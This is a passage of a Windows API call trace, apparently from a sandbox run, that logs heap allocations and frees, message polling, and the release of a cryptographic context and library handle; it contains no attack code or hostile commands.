HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0267.313] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.313] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.314] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.314] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0267.314] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.314] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.314] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.314] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.321] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.321] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0267.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.321] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.321] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.322] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.322] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.322] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.322] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.322] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.322] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0267.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.323] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0267.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.323] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0267.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.325] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.325] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.325] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.325] FreeLibrary (hLibModule=0x756e0000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0267.325] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.325] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.326] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.326] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.326] CloseHandle (hObject=0x2d0) returned 1 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0267.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0267.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51700 [0267.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51718 [0267.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0267.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.330] CloseHandle (hObject=0x2a0) returned 1 [0267.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0267.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0267.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0267.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0267.337] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: 